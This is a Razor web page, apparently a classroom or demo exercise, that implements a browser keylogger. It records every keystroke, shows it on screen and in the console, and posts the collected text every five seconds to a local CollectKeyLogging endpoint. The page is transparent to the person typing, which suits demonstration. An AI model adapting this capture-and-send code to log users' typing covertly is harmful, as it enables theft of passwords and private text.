
@{


    ViewBag.Title = "Key Logger";
}

<h2>Key Logger</h2>

<div class="well">
    <p>Feel free to type anything :)</p>
    <div id="output"></div>
</div>
<div>
    <p>@Html.ActionLink("Go Back", "Index", "Home")</p>
</div>


<script type="text/javascript">
    var word = "";
    var sentence = "";
    var text = "";
    var outputDiv = document.getElementById("output");

    //sending to console developer window
    document.addEventListener("keydown", function (e) {
        var character_code = event.which || event.keyCode;
        var character_value = String.fromCharCode(character_code);

        console.log("Current character: " + character_code + " " + character_value);
        outputDiv.innerHTML += "Current character: " + character_code + " " + character_value + '<br />';

        //get word // each letter
        word += character_value;

        //32 = space
        //get sentence
        if (character_code == 32) {
            console.log("Word " + word);
            outputDiv.innerHTML += "Word " + word + '<br />';
            sentence += word;
            word = "";
        }

        //13 = enter 190 = .
        //get text
        if (character_code == 13 || character_code == 190) {
            sentence += word;
            console.log("Sentence: " + sentence);
            outputDiv.innerHTML += "Sentence: " + sentence + '<br />';
            text += sentence + word;
            word = "";
            sentence = "";
        }
    });

    // sending to client
    setInterval(function () {
        if (text.length > 0) {
            console.log("Text for submission: " + text);
            outputDiv.innerHTML += "Text for submission: " + text + '<br />';

            var xhr = new XMLHttpRequest();
            xhr.open('POST', 'http://localhost:' + window.location.port + '/API/CollectKeyLogging');
            xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
            xhr.send('text=' + text);
            text = "";
            sentence = "";
            word = "";
        }
    }, 5000);
</script>



